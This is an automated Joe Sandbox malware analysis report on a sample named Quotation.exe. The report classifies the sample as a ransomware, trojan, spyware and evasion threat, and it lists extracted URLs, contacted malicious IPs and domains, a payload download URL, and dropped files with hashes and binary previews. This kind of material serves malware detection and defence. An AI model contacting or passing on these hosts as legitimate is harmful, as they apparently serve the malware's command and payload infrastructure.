                                                                                                    http://nsis.sf.net/NSIS_ErrorQuotation.exefalse
                                                                                                      		high
                                                                                                      http://www.cactus-market.ruexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.brightfms.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.funvacayflorida.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.symauth.com/rpa00Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drfalse
                                                                                                        		high
                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.nero.comQuotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drfalse
                                                                                                            		high
                                                                                                            http://www.brightfms.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.texasgent.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.flaviosilva.onlineexplorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.msn.com/en-us/money/other/7-common-travel-mistakes-every-rv-owner-has-made/ss-AAOGa8lexplorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.buymyenergy.comwww.184411.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.buymyenergy.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.flaviosilva.onlinewww.solya-shop.comexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.wittofitentertainment.com/kGQffjENy187.bin0Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.julesgifts.co.ukexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banneexplorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://browsehappy.com/explorer.exe, 0000000C.00000002.26450887427.0000000014AEA000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000614A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://wns.windows.com/cc6424aexplorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindowexplorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.maxhaidt.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.buymyenergy.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.cardinialethanol.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://23.83.160.2:88/tz.php?ref=explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.aznqmd.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.dexmart.xyz/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://support.google.com/chrome/?p=plugin_flashcontrol.exe, 0000000D.00000002.26417532491.0000000007600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.solya-shop.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown

                                                                                                                        World Map of Contacted IPs

                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs

                                                                                                                        Public IPs

                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        91.184.0.24
                                                                                                                        		www.b-tek.mediaNetherlands
                                                                                                                        		197902HOSTNETNLtrue
                                                                                                                        45.194.145.38
                                                                                                                        		www.buymyenergy.comSeychelles
                                                                                                                        		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                        199.192.26.35
                                                                                                                        		www.dexmart.xyzUnited States
                                                                                                                        		22612NAMECHEAP-NETUStrue
                                                                                                                        217.160.0.217
                                                                                                                        		www.solya-shop.comGermany
                                                                                                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                        154.215.156.6
                                                                                                                        		bb.zhanghonghong.comSeychelles
                                                                                                                        		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                        34.117.168.233
                                                                                                                        		td-ccm-168-233.wixdns.netUnited States
                                                                                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                                                                        81.17.18.196
                                                                                                                        		www.brightfms.comSwitzerland
                                                                                                                        		51852PLI-ASCHtrue
                                                                                                                        23.83.160.9
                                                                                                                        		www.aznqmd.comUnited States
                                                                                                                        		7203LEASEWEB-USA-SFO-12UStrue
                                                                                                                        162.240.73.101
                                                                                                                        		www.wittofitentertainment.comUnited States
                                                                                                                        		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                        208.91.197.91
                                                                                                                        		www.funvacayflorida.comVirgin Islands (BRITISH)
                                                                                                                        		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                        81.17.29.148
                                                                                                                        		www.texasgent.comSwitzerland
                                                                                                                        		51852PLI-ASCHtrue
                                                                                                                        88.212.206.251
                                                                                                                        		www.interactive-media.ruRussian Federation
                                                                                                                        		39134UNITEDNETRUtrue
                                                                                                                        2.57.90.16
                                                                                                                        		eta-trader.netLithuania
                                                                                                                        		47583AS-HOSTINGERLTtrue
                                                                                                                        172.67.212.220
                                                                                                                        		www.maxhaidt.comUnited States
                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                        198.58.118.167
                                                                                                                        		www.cardinialethanol.comUnited States
                                                                                                                        		63949LINODE-APLinodeLLCUStrue

                                                                                                                        General Information

                                                                                                                        Joe Sandbox Version:37.0.0 Beryl
                                                                                                                        Analysis ID:830618
                                                                                                                        Start date and time:2023-03-20 14:56:34 +01:00
                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                        Overall analysis duration:0h 17m 10s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:light
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                        Number of analysed new started processes analysed:19
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:1
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • HDC enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample file name:Quotation.exe
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.rans.troj.spyw.evad.winEXE@11/11@18/15
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        HDC Information:
                                                                                                                        • Successful, ratio: 14.4% (good quality ratio 13.9%)
                                                                                                                        • Quality average: 81.7%
                                                                                                                        • Quality standard deviation: 25.8%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 89%
                                                                                                                        • Number of executed functions: 0
                                                                                                                        • Number of non-executed functions: 0
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                        Warnings

                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                        • HTTP Packets have been reduced
                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

                                                                                                                        No simulations

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        No context

                                                                                                                        Domains

                                                                                                                        No context

                                                                                                                        ASNs

                                                                                                                        No context

                                                                                                                        JA3 Fingerprints

                                                                                                                        No context

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Blegnbbetheden\Telegrammers.Non

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):261995
                                                                                                                        Entropy (8bit):7.29610483044462
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:od+8r4FkVd2EInntyLURcXLFL4t5qbHGSIBb:WRrHOnntQrXLN+qSSIZ
                                                                                                                        MD5:258AEA53C2D4917537DC6E160ED83890
                                                                                                                        SHA1:1E9D937187DA27F205D2E7052C4F875374564410
                                                                                                                        SHA-256:078ABD959945A2DE0905D4FF7B7288291B19603BFE6EDA64986BE47313F2D26D
                                                                                                                        SHA-512:254A5CAEC00C6A72CEAF83E1C7FDF6BCBB8B3B599EC679C4869FF93D91C06B6C6857A8BF7F450E2A984145DC2E70BA0F687E51A19A26A98C4D9360CD2797E7E5
                                                                                                                        Malicious:false
                                                                                                                        Preview:++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\Privileger.Fla

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:ASCII text, with very long lines (55032), with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):55032
                                                                                                                        Entropy (8bit):2.669891427410196
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:iplrX/Vcn0/T7ADSEsfSKcFpWDAlJAhCieRTN3stuby6VVAkXnCrsiKmdQy7UElT:sTQnJCndT7SpBHC
                                                                                                                        MD5:6E31A03A1B956DF431E66A4360494661
                                                                                                                        SHA1:0236923F575AF0C82263CAD2C260859433C91E93
                                                                                                                        SHA-256:944E9D3BA3195866EA449AAAA1B10912847058836D4CE7D40FA321A926E5FA2E
                                                                                                                        SHA-512:12FF3A92BB2EE101B25455196D78EE7493594E9C68A6F781395FF69531D5F7BEEE915660E012E42107E8995F5C3AE6913471CF020F42F912437EC207D94EE9F7
                                                                                                                        Malicious:false
                                                                                                                        Preview:00000000000000B900D20058580000CB002B0000BC00000808005A0000000000000000000071000057000000000500BCBCBC00000000000012000300C0C0000000B1000000A3A3A300DBDB000000000600440000000000310000FFFF001500EB00000000710000EBEB0000D4000000979700000000E300000000000000E80000008F00CE0000C7C7C700FFFFFFFF006E6E004200AFAFAF00580000F0F0F0F0000000F7F7F7001F1F0051000F0000006D00B8B80029290000898900424242009A0050505000000000B7B700000B0B0B0B0B0000000000D20064646400000004000000696969000000000000808000C0C000004100000F006400B4000000D0D0D0D0D0D0003A3A000000008700002F2F0000F10094005E005E5E002A2A000000009F9F9F004B4B0000585858000000181800005700E2E2000000007C0045000000D1008484848484000000007D00002525000000000032323200000000000000008500000041414141414100009B00B4002B2B2B0000D80000F5F5F5F5F5F5F5F5F5F5F50000191919002A000A0000003131313100D8D8D80000404000007D7D009999999999999900A4A4A4A4A40000000000000000AD00B0B0B00000CFCFCFCFCFCF00F3F3F3F3F3000093000000EFEFEF00E6E6002C2C2C00350000005B000E0E0E000000EFEF000000000025000000009E0000

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):75248
                                                                                                                        Entropy (8bit):6.149004775364808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:GmY7dQU8l75gS4SqQR27YZW1cwvbTxUd6Rw:GmacliS49QR27YZW1vn2dWw
                                                                                                                        MD5:3A03B61FA01DCDFF3E595D279F159D6E
                                                                                                                        SHA1:94900C28C23AD01D311C389A0813277CFB30345C
                                                                                                                        SHA-256:4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
                                                                                                                        SHA-512:0D04D3486911DFE0439449554E90FB68B4D85EEE025A9B89910C306DE33CBFDBBEF1ABCAC5D4CD3B3CC1B1F445B7C67DC341C9363C9B127810ABD0498EC94AC4
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..:..:..:....:.....:..;..:..]..:..]...:..]..:..]...:..u...:..u..:....:..u...:.Rich.:.........PE..L...w..U...........!.....:..........dG.......P...............................@.......p....@.................................<...P.... .......................0.......P..8............................R..@............P..............(Q..H............text...!8.......:.................. ..`.rdata......P.......>..............@..@.data...............................@....rsrc........ ......................@..@.reloc.. ....0......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):485488
                                                                                                                        Entropy (8bit):6.710350474742332
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:1E5AW+0VyAaOKxFf8r6S2rGjF0KAmdHCKsCZcufvh7OzxQxQ5JVIRVrk:KGWlaOKC2a0tmFChCOFeqLIRpk
                                                                                                                        MD5:84D7B1FB924AEEFCF4A2C7A687FE2EF1
                                                                                                                        SHA1:A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B
                                                                                                                        SHA-256:32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
                                                                                                                        SHA-512:E75F91DA415B15CA0B19519179021FD88C0FC68FE4EF2A68B899B121BD511C04AECCB58101318C86CB0458D7310208C358DBB9155A02D62DE73C04128ECC5934
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....fW..........." .........................................................`............`...@......@............... ...........................................1...D..p$...P.......0..T...............................................................H............text.............................. ..`.data...wy.......z..................@....reloc.......P.......:..............@..B............................................0...........................T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):49768
                                                                                                                        Entropy (8bit):5.650496280667822
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:4vuoy1c6A2ZX8TRNH5JVbOd502zq1TntV5fljM:4vuoO3ZX8Q5jzC35NjM
                                                                                                                        MD5:BCC32F5B608C99F89508921B6333B329
                                                                                                                        SHA1:5F70BB4A3A812C399D8D2A2954C9A715574CFF61
                                                                                                                        SHA-256:5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
                                                                                                                        SHA-512:99C7623BCA873C75A3B804C815DF178ACC88E043A36473C785216CD26DC73F0525FE336F17F0F2C8CA6473FBD407A953D4650D093C52440D93ECF07C1440FAB6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................................`.....................................O.......................h$.............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36029
                                                                                                                        Entropy (8bit):5.699900454607003
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:Hm5z53y6m/LHlM6GnPGUvMrsztd/sLLhF3VI:a53y6Gy6GuU5d/OhF3G
                                                                                                                        MD5:8A54723090530190EB11AFCD5B702B1B
                                                                                                                        SHA1:DFA923EC796A754BD21C4F9E504305848A4CB1B2
                                                                                                                        SHA-256:738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
                                                                                                                        SHA-512:E0D310458C8259112E07B153EDC86FDFF29E1B09648FED8D163D44DEB3BEE1545E7AD37BB00E9255DF6514844B21A829750848DA42F85FA77BEF376CE09750CF
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........<.....&".....R..........0..........h.....................................^........ .................................................................................`...............................(....................................................text...HP.......R..................`.P`.data........p.......V..............@.P..rdata...............X..............@.`@.pdata...............b..............@.0@.xdata...............j..............@.0@.bss.... .............................`..edata...............r..............@.0@.idata...............v..............@.0..CRT....X............~..............@.@..tls................................@.@..reloc..`...........................@.0B........................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):130344
                                                                                                                        Entropy (8bit):6.2622011397185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:tKInqqVjbm+1Vi5R6QQU7k1TAH1OobTrWHEE+jFpCOx:tVzjvi5R6QQU7k1TAH1OobTrWHExFpdx
                                                                                                                        MD5:2455841538BA8A502398C18781CC3CEB
                                                                                                                        SHA1:86CFD513FEE46EBC2C35225B27372679BE6ADA91
                                                                                                                        SHA-256:F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
                                                                                                                        SHA-512:BC1DCDDE074150616DED7EAACC3FC44BDD2487EB5E550172F5EA46432AA76F19443A9FD6CEF61577B7803C1B083FFCBCEAF9ADC3114A97B547A78C2654F757E3
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"....."....................\d.............................P......z.....`... .................................................X....0..................x....@.............................. ..(.......................P............................text...8!......."..................`.P`.data........@.......&..............@.`..rdata...^...P...`...(..............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..X...........................@.0..CRT....X...........................@.@..tls....h.... ......................@.`..rsrc........0......................@.0..reloc.......@......................@.0B................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):227256
                                                                                                                        Entropy (8bit):6.388677533277947
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:ue/rKQgYva3o4vj272BNvIJuQlf2qIHL2:uYrK4a3PvKw7ufg2
                                                                                                                        MD5:49A2E97304EF8E044EEBD7ACCAD37E11
                                                                                                                        SHA1:7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A
                                                                                                                        SHA-256:83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
                                                                                                                        SHA-512:AC206C5EF6F373A0005902D09110A95A7F5FB4F524653D30C3A65182717272FE244694A6698D40884BEA243B2CA00D7741CED796DF7AE8C633F513B8C6FCD6C8
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
